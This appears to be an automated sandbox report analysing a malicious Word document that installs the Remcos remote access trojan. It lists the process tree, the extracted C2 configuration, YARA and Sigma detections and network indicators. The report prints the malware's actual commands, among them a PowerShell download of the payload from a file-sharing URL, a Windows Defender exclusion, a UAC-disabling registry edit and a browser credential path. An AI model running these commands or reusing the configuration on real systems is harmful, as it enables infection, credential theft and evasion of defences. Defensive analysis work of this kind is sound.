Edit tour

Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Sample Name:	12543_0008858249_FWDOUTSTANDING_20200604.doc
Analysis ID:	611840
MD5:	090e1dfdcbf2185788ea14cd113cc39f
SHA1:	6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:	3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
Tags:	docRemcosRAT
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Multi AV Scanner detection for domain / URL

Document contains OLE streams with names of living off the land binaries

Machine Learning detection for sample

Powershell drops PE file

Document contains OLE streams with PE executables

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: Suspicious MsiExec Embedding Parent

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Sigma detected: Cabinet File Expansion

Uses insecure TLS / SSL version for HTTPS connection

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain checking for process token information

Sigma detected: Msiexec Initiated Connection

Checks for available system drives (often done to infect USB drives)

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

Internet Provider seen in connection with other malware

Document contains an embedded VBA macro which executes code when the document is opened / closed

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Uses cacls to modify the permissions of files

Document contains embedded VBA macros

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Potential document exploit detected (performs HTTP gets)

Sigma detected: Autorun Keys Modification

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 7068 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

msiexec.exe (PID: 3568 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6020 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

icacls.exe (PID: 3316 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

expand.exe (PID: 6308 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)

conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

TRY.exe (PID: 5860 cmdline: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B)

cmd.exe (PID: 6672 cmdline: cmd /c thai.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 6700 cmdline: powershell -command "Set-MpPreference -ExclusionExtension ".exe" MD5: 95000560239032BC68B4C2FDFCDEF913)

powershell.exe (PID: 6884 cmdline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe" MD5: 95000560239032BC68B4C2FDFCDEF913)

icacls.exe (PID: 5196 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6744 cmdline: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5188 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.4.1 Pro", "Host:Port:Password": "bambam.hopto.org:2311:1", "Assigned name": "TRY ", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-6NUKCJ", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
12543_0008858249_FWDOUTSTANDING_20200604.doc	SUSP_Doc_WindowsInstaller_Call_Feb22_1	Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.	Nils Kuhnert	0xe039:$: WindowsInstaller.Installer$ 0xec0b:$: CreateObject 0xec36:$: InstallProduct
12543_0008858249_FWDOUTSTANDING_20200604.doc	Office_AutoOpen_Macro	Detects an Microsoft Office file that contains the AutoOpen Macro function	Florian Roth	0xe1f3:$s1: AutoOpen 0xebee:$s1: AutoOpen 0xd500:$s2: Macros

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP	SUSP_Doc_WindowsInstaller_Call_Feb22_1	Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.	Nils Kuhnert	0x239f:$: WindowsInstaller.Installer$ 0x22c0:$: CreateObject 0x4000:$: CreateObject 0x417c:$: CreateObject 0x41ba:$: CreateObject 0x4c19:$: CreateObject 0x41f0:$: InstallProduct
C:\Users\user\AppData\Local\Temp\~DF3D7E64A57D9B524A.TMP	SUSP_VBA_FileSystem_Access	Detects suspicious VBA that writes to disk and is activated on document open	Florian Roth	0x3ae4:$s1: \Common Files\Microsoft Shared\ 0x200b:$s2: Scripting.FileSystemObject 0x236a:$a3: AutoOpen 0x3fd2:$a3: AutoOpen 0x41cc:$a3: AutoOpen 0x4c34:$a3: AutoOpen
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x600e0:$s1: \Classes\mscfile\shell\open\command 0x60140:$s1: \Classes\mscfile\shell\open\command 0x60128:$s2: eventvwr.exe
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe	REMCOS_RAT_variants	unknown	unknown	0x61064:$str_a1: C:\Windows\System32\cmd.exe 0x60fe0:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60fe0:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x605d8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60c30:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x601d4:$str_b2: Executing file: 0x611a8:$str_b3: GetDirectListeningPort 0x609f0:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60c18:$str_b7: \update.vbs 0x601fc:$str_b9: Downloaded file: 0x601e8:$str_b10: Downloading file: 0x6028c:$str_b12: Failed to upload file: 0x61170:$str_b13: StartForward 0x61190:$str_b14: StopForward 0x60bc0:$str_b15: fso.DeleteFile " 0x60b54:$str_b16: On Error Resume Next 0x60bf0:$str_b17: fso.DeleteFolder " 0x6027c:$str_b18: Uploaded file: 0x6023c:$str_b19: Unable to delete: 0x60b88:$str_b20: while fso.FileExists(" 0x60711:$str_c0: [Firefox StoredLogins not found]

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files", CommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6020, ParentProcessName: msiexec.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files", ProcessId: 6744, ProcessName: cmd.exe

Source: Process started

Author: Bhabesh Raj: Data: Command: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\expand.exe, NewProcessName: C:\Windows\SysWOW64\expand.exe, OriginalFileName: C:\Windows\SysWOW64\expand.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6020, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, ProcessId: 6308, ProcessName: expand.exe

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.47.40.36, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 3568, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49742

Source: Process started

Author: James Pemberton / @4A616D6573: Data: Command: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", ProcessId: 6884, ProcessName: powershell.exe

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, ProcessId: 5860, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6672, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", ProcessId: 6700, ProcessName: powershell.exe

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH, ParentImage: C:\Windows\SysWOW64\icacls.exe, ParentProcessId: 3316, ParentProcessName: icacls.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3384, ProcessName: conhost.exe

Source: Process started

Author: frack113: Data: Command: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6020, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe" , ProcessId: 5860, ProcessName: TRY.exe

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132949457099821122.6700.DefaultAppDomain.powershell

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-180029104309546480	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/$	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/	Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Avira: detection malicious, Label: HEUR/AGEN.1213068

Found malware configuration

Source: TRY.exe.17.dr

Malware Configuration Extractor: Remcos {"Version": "3.4.1 Pro", "Host:Port:Password": "bambam.hopto.org:2311:1", "Assigned name": "TRY ", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-6NUKCJ", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Multi AV Scanner detection for submitted file

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	Virustotal: Detection: 37%			Perma Link
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc	ReversingLabs: Detection: 24%

Yara detected Remcos RAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe, type: DROPPED

Multi AV Scanner detection for domain / URL

Source: filebin.net	Virustotal: Detection: 5%			Perma Link
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi	Virustotal: Detection: 5%			Perma Link

Machine Learning detection for sample

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TRY.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC42E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA,

12_2_00007FF6BAC42E28

Source: TRY.exe.17.dr

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49775 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 87.238.33.7:443 -> 192.168.2.5:49776 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.5:49744 version: TLS 1.2

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Source:	Binary string: wextract.pdb source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: wextract.pdbGCTL source: TRY.exe, 0000000C.00000002.503239949.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 0000000C.00000000.465650834.00007FF6BAC49000.00000002.00000001.01000000.00000005.sdmp, bb2cb0e0b15f2f48a7107e59f4aa2fc6.tmp.10.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr, files.cab.4.dr
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSIFECD.tmp.3.dr, MSI1064.tmp.3.dr, MSI847A.tmp.3.dr, 54841d.msi.3.dr, MSI94E.tmp.3.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe

Code function: 12_2_00007FF6BAC41F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

12_2_00007FF6BAC41F00

Source: global traffic

TCP traffic: 192.168.2.5:49742 -> 185.47.40.36:443

Source: global traffic

DNS query: name: filebin.net

Source: global traffic

TCP traffic: 192.168.2.5:49742 -> 185.47.40.36:443

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: bambam.hopto.org

Source: Joe Sandbox View	JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.5:49775 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 87.238.33.7:443 -> 192.168.2.5:49776 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /rf43v6qzghbj7h7b/TRY.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: filebin.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/7ff329000ec5f0e56f28414ebbe22f0c0905296169e7398f417a543e662f9503?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072844Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.exe%22&response-content-type=application%2Fvnd.microsoft.portable-executable&X-Amz-Signature=c205dd25825136b9a5d453fd33964b1791fdc2217c3bde2a85904dc7ce3c2af9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: situla.bitbit.netConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: REDPILL-LINPRORedpillLinproNO REDPILL-LINPRORedpillLinproNO

Source: Joe Sandbox View	IP Address: 87.238.33.8 87.238.33.8
Source: Joe Sandbox View	IP Address: 185.47.40.36 185.47.40.36

Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 931CA4E3-9003-4E2D-AC60-8F56ED9BC214.0.dr	String found in binary or memory: https://api.office.net
